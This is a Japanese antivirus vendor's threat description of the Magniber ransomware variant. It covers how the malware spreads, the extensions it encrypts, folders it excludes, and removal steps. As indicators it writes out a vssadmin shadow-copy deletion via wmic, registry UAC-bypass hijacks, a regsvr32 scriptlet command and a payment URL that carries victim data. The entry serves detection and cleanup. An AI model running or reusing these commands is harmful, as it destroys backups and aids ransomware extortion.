Ransom.Win64.MAGNIBER.C
Ransom:Win64/Magniber.!MTB (MICROSOFT)
Windows
マルウェアタイプ:
身代金要求型不正プログラム(ランサムウェア)
破壊活動の有無:
なし
暗号化:
はい
感染報告の有無 :
はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
マルウェアは、ワーム活動の機能を備えていません。
マルウェアは、バックドア活動の機能を備えていません。
マルウェアは、感染コンピュータ上の特定の情報を収集します。
マルウェアは、特定のWebサイトに誘導します。 ただし、情報公開日現在、このWebサイトにはアクセスできません。
身代金要求文書のファイルを作成します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のプロセスを追加します。
- Display ransom note:
- notepad.exe %Public%\readme.txt
- Open payment page through browser:
- cmd /c "start http://{Random characters}kynscshsn.{BLOCKED}s.uno/kynscshsn&{string1}&{string2}&{string3}&{string4}&{string5} "
- where
- string1
- The number of drives in which the ransomware has enumerated files
- string2
- Total size of encrypted data has generated in bytes
- string3
- The number of files it encrypts
- cmd /c "start http://{Random characters}kynscshsn.{BLOCKED}s.uno/kynscshsn&{string1}&{string2}&{string3}&{string4}&{string5} "
- string4
- The number of file it enumerates
- string5
- The build number of the comprimised windows OS
マルウェアは、以下のプロセスに自身を組み込み、システムのプロセスに常駐します。
- It injects into each process if the ff. criteria is met:
- The process is not iexplore.exe
マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。
- kynscshsn
他のシステム変更
マルウェアは、以下のレジストリ値を追加します。
if running on Win10:
HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(Default) = regsvr32.exe scrobj.dll /s /u /n /i:%Public%\readme.txt → initial registry entry where file originally contains code to delete shadow files
HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
DelegateExecute = 0
if running on Windows versions < Win10:
HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
(Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
感染活動
マルウェアは、ワーム活動の機能を備えていません。
バックドア活動
マルウェアは、バックドア活動の機能を備えていません。
ルートキット機能
マルウェアは、ルートキット機能を備えていません。
情報漏えい
マルウェアは、感染コンピュータ上の以下の情報を収集します。
- The number of drives it enumerates
- Total size of encrypted data
- The number of encrypted files
- The number of enumerated files
- Build number of the compromised windows operating system
その他
マルウェアは、以下の拡張子をもつファイルを暗号化します。
- abm
- abs
- abw
- accdb
- act
- adn
- adp
- aes
- aft
- afx
- agif
- agp
- ahd
- ai
- aic
- aim
- albm
- alf
- ans
- apd
- apm
- apng
- aps
- apt
- apx
- arc
- art
- arw
- asc
- ase
- asf
- ask
- asm
- asp
- asw
- asy
- aty
- avi
- awdb
- awp
- awt
- aww
- azz
- bad
- bak
- bay
- bbs
- bdb
- bdp
- bdr
- bean
- bib
- bmp
- bmx
- bna
- bnd
- boc
- bok
- brd
- brk
- brn
- brt
- bss
- btd
- bti
- btr
- c
- ca
- cals
- can
- cd
- cdb
- cdc
- cdg
- cdmm
- cdmt
- cdmz
- cdr
- cdt
- cf
- cfu
- cgm
- cimg
- cin
- cit
- ckp
- class
- clkw
- cma
- cmx
- cnm
- cnv
- colz
- cpc
- cpd
- cpg
- cpp
- cps
- cpx
- crd
- crt
- crw
- cs
- csr
- csv
- csy
- ct
- cvg
- cvi
- cvs
- cvx
- cwt
- cxf
- cyi
- dad
- daf
- db
- dbc
- dbf
- dbk
- dbs
- dbt
- dbv
- dbx
- dca
- dcb
- dch
- dcr
- dcs
- dct
- dcx
- dd
- dds
- ded
- der
- dgn
- dgs
- dgt
- dhs
- dib
- dif
- dip
- diz
- djv
- djvu
- dmi
- dmo
- dnc
- dne
- doc
- docb
- docm
- docx
- docz
- dot
- dotm
- dotx
- dpp
- dpx
- dqy
- drw
- drz
- dsk
- dsn
- dsv
- dt
- dta
- dtsx
- dtw
- dv
- dvi
- dwg
- dx
- dxb
- dxf
- eco
- ecw
- ecx
- edb
- efd
- egc
- eio
- eip
- eit
- em
- emd
- emf
- emlx
- ep
- epf
- epp
- eps
- epsf
- eq
- erf
- err
- etf
- etx
- euc
- exr
- fa
- faq
- fax
- fb
- fbx
- fcd
- fcf
- fdf
- fdr
- fds
- fdt
- fdx
- fdxt
- fes
- fft
- fi
- fic
- fid
- fif
- fig
- fla
- flr
- flv
- fmv
- fo
- fodt
- fpos
- fpt
- fpx
- frm
- frt
- frx
- ftn
- fwdn
- fxc
- fxg
- fzb
- fzv
- gcdp
- gdb
- gdoc
- gem
- geo
- gfb
- gfie
- ggr
- gif
- gih
- gim
- gio
- glox
- gpd
- gpg
- gpn
- gro
- grob
- grs
- gsd
- gthr
- gtp
- gv
- gwi
- gz
- h
- hbk
- hdb
- hdp
- hdr
- hht
- his
- hp
- hpg
- hpi
- hs
- htc
- hwp
- hz
- ib
- ibd
- icn
- icon
- icpr
- idc
- idea
- idx
- igt
- igx
- ihx
- ii
- iiq
- imd
- info
- ink
- ipf
- ipx
- iso
- itdb
- itw
- iwi
- j
- jar
- jas
- java
- jbig
- jbmp
- jbr
- jfif
- jia
- jis
- jng
- joe
- jpe
- jpeg
- jpg
- jps
- jpx
- jrtf
- js
- jsp
- jtf
- jtx
- jw
- jxr
- kdb
- kdbx
- kdc
- kdi
- kdk
- kes
- key
- kic
- klg
- knt
- kon
- kpg
- kwd
- lay
- lbm
- lbt
- ldf
- lgc
- lis
- lit
- ljp
- lmk
- lnt
- lrc
- lst
- ltr
- ltx
- lue
- luf
- lwo
- lwp
- lws
- lyt
- lyx
- ma
- mac
- man
- map
- maq
- mat
- max
- mb
- mbm
- mbox
- mdb
- mdf
- mdn
- mdt
- me
- mef
- mel
- mft
- mgcb
- mgmf
- mgmt
- mgmx
- mgtx
- mid
- min
- mkv
- mm
- mmat
- mnr
- mnt
- mos
- mov
- mpeg
- mpf
- mpg
- mpo
- mrg
- mrxs
- msg
- mud
- mwb
- mwp
- mx
- my
- myd
- myi
- ncr
- nct
- ndf
- nef
- nfo
- njx
- nlm
- now
- nrw
- nsf
- nyf
- nzb
- obj
- oce
- oci
- ocr
- odb
- odg
- odm
- odo
- odp
- ods
- odt
- of
- oft
- omf
- oplc
- oqy
- ora
- orf
- ort
- orx
- ost
- ota
- otg
- oti
- otp
- ots
- ott
- ovp
- ovr
- owc
- owg
- oyx
- ozb
- ozj
- ozt
- p
- pa
- pan
- pano
- pap
- paq
- pas
- pbm
- pcd
- pcs
- pdb
- pdd
- pdm
- pds
- pdt
- pef
- pem
- pff
- pfi
- pfs
- pfv
- pfx
- pgf
- pgm
- phm
- php
- pic
- pict
- pix
- pjpg
- pjt
- plt
- pm
- pmg
- png
- pni
- pnm
- pntg
- pnz
- pobj
- pop
- pot
- potm
- potx
- ppam
- ppm
- pps
- ppsm
- ppsx
- ppt
- pptm
- pptx
- prt
- prw
- psd
- psdx
- pse
- psid
- psp
- pst
- psw
- ptg
- pth
- ptx
- pu
- pvj
- pvm
- pvr
- pwa
- pwi
- pwr
- px
- pxr
- pza
- pzp
- pzs
- qd
- qmg
- qpx
- qry
- qvd
- rad
- rar
- ras
- raw
- rb
- rctd
- rcu
- rd
- rdb
- rft
- rgb
- rgf
- rib
- ric
- riff
- ris
- rix
- rle
- rli
- rng
- rpd
- rpf
- rpt
- rri
- rs
- rsb
- rsd
- rsr
- rst
- rt
- rtd
- rtf
- rtx
- run
- rw
- rzk
- rzn
- saf
- sam
- sbf
- scad
- scc
- sch
- sci
- scm
- sct
- scv
- scw
- sdb
- sdf
- sdm
- sdoc
- sdw
- sep
- sfc
- sfw
- sgm
- sh
- sig
- skm
- sla
- sld
- sldm
- sldx
- slk
- sln
- sls
- smf
- sms
- snt
- sob
- spa
- spe
- sph
- spj
- spp
- spq
- spr
- sq
- sqb
- srw
- ssa
- ssk
- st
- stc
- std
- sti
- stm
- stn
- stp
- str
- stw
- sty
- sub
- suo
- svf
- svg
- svgz
- swf
- sxc
- sxd
- sxg
- sxi
- sxm
- sxw
- tab
- tar
- tbk
- tcx
- tdf
- tdt
- te
- tex
- text
- tgz
- thp
- tif
- tiff
- tlb
- tlc
- tm
- tmd
- tmv
- tmx
- tne
- tpc
- trm
- tvj
- udb
- ufr
- unx
- uof
- uop
- uot
- upd
- usr
- utxt
- vb
- vbr
- vbs
- vcd
- vct
- vdb
- vdi
- vec
- vm
- vmdk
- vmx
- vnt
- vob
- vpd
- vrm
- vrp
- vsd
- vsdm
- vsdx
- vsm
- vstm
- vstx
- vue
- vw
- wav
- wbk
- wcf
- wdb
- wgz
- wire
- wks
- wma
- wmdb
- wmv
- wn
- wp
- wpa
- wpd
- wpg
- wps
- wpt
- wpw
- wri
- wsc
- wsd
- wsh
- wtx
- x
- xar
- xd
- xdb
- xlc
- xld
- xlf
- xlgc
- xlm
- xls
- xlsb
- xlsm
- xlsx
- xlt
- xltm
- xltx
- xlw
- xps
- xwp
- xyp
- xyw
- ya
- ybk
- ym
- zabw
- zdb
- zdc
- zip
- zw
マルウェアは、以下のWebサイトに誘導します。
- http://{Random characters}kynscshsn.{BLOCKED}s.uno/kynscshsn&{string1}&{string2}&{string3}&{string4}&{string5} → connects to payment page
ただし、情報公開日現在、このWebサイトにはアクセスできません。
マルウェアは、脆弱性を利用した感染活動を行いません。
ランサムウェアの不正活動
マルウェアは、以下のフォルダ内で確認されたファイルの暗号化はしません。
- documents and settings
- appdata
- local settings
- sample music
- sample pictures
- sample videos
- tor browser
- recycle
- windows
- boot
- intel
- msocache
- perflogs
- program files
- programdata
- recovery
- system volume information
- winnt
マルウェアは、暗号化されたファイルのファイル名に以下の拡張子を追加します。
- .kynscshsn
マルウェアが作成する以下のファイルは、脅迫状です。
- %Public%\readme.txt
- {Encrypted Directory}\readme.txt
<補足>
インストール
マルウェアは、以下のプロセスを追加します。
- ランサムノート(脅迫状)を表示する
- notepad.exe %Public%\readme.txt
- ブラウザで支払いページを開く
- cmd /c "start http://{ランダムな文字}kynscshsn.{BLOCKED}s.uno/kynscshsn&{文字列1}&{文字列2}&{文字列3}&{文字列4}&{文字列5} "
- 上記の文字列は以下
- 文字列1:ランサムウェアがファイルを列挙したドライブの数
- 文字列2:暗号化されたデータの合計サイズ、単位:バイトで生成されたもの
- 文字列3:暗号化されたファイルの数
- 文字列4:列挙したファイルの数
- 文字列5:感染したWindows OS のビルド番号
- 上記の文字列は以下
- cmd /c "start http://{ランダムな文字}kynscshsn.{BLOCKED}s.uno/kynscshsn&{文字列1}&{文字列2}&{文字列3}&{文字列4}&{文字列5} "
- %System%\wbem\wmic process call create "vssadmin. exe Delete Shadows /all /quiet" → シャドウコピーを削除する
- cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"" → Windows 10で実行されている場合
- cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"" → Windows 10以前のバージョンで実行されている場合
マルウェアは、以下の条件を満たす場合、感染システムのメモリ内で実行されている各プロセスに自身を注入します。
- プロセスがiexplore.exeではない場合
情報漏えい
マルウェアは、感染コンピュータ上の以下の情報を収集します。
- 列挙したドライブの数
- 暗号化したデータの合計サイズ
- 暗号化したファイルの数
- 列挙したファイルの数
- 感染したWindowsオペレーティングシステム(OS)のビルド番号
その他
マルウェアは、以下のWebサイトに誘導します。
- http://{ランダムな文字}kynscshsn.{BLOCKED}s.uno/kynscshsn&{文字列1}&{文字列2}&{文字列3}&{文字列4}&{文字列5} → 支払いページへ接続する
マルウェアは、以下の利用可能なドライブを暗号化します。
- リムーバブルドライブ
- リモートドライブ
- 固定ドライブ
マルウェアは、以下のァイル属性を持つファイルを暗号化することを避けます。
- FILE_ATTRIBUTE_SYSTEM
- FILE_ATTRIBUTE_HIDDEN
- FILE_ATTRIBUTE_READYONLY
- FILE_ATTRIBUTE_TEMPORARY
- FILE_ATTRIBUTE_VIRTUAL
マルウェアは、以下のァイル属性を持つフォルダを暗号化することを避けます。
- FILE_ATTRIBUTE_SYSTEM
- FILE_ATTRIBUTE_HIDDEN
- FILE_ATTRIBUTE_ENCRYPTED
対応方法
手順 1
Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
「Ransom.Win64.MAGNIBER.C」で検出したファイル名を確認し、そのファイルを終了します。
- すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
- 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
セーフモードについては、こちらをご参照下さい。 - 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。
手順 4
このレジストリ値を削除します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- (Default) = regsvr32.exe scrobj.dll /s /u /n /i:%Public%\readme.txt
- (Default) = regsvr32.exe scrobj.dll /s /u /n /i:%Public%\readme.txt
- In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- (Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
- (Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
- In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- DelegateExecute = 0
- DelegateExecute = 0
- In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- (Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
- (Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
手順 5
以下のファイルを検索し削除します。
- %Public%\readme.txt
- {Encrypted Directory}\readme.txt
手順 6
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Ransom.Win64.MAGNIBER.C」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
手順 7
暗号化されたファイルをバックアップから復元します。
ご利用はいかがでしたか? アンケートにご協力ください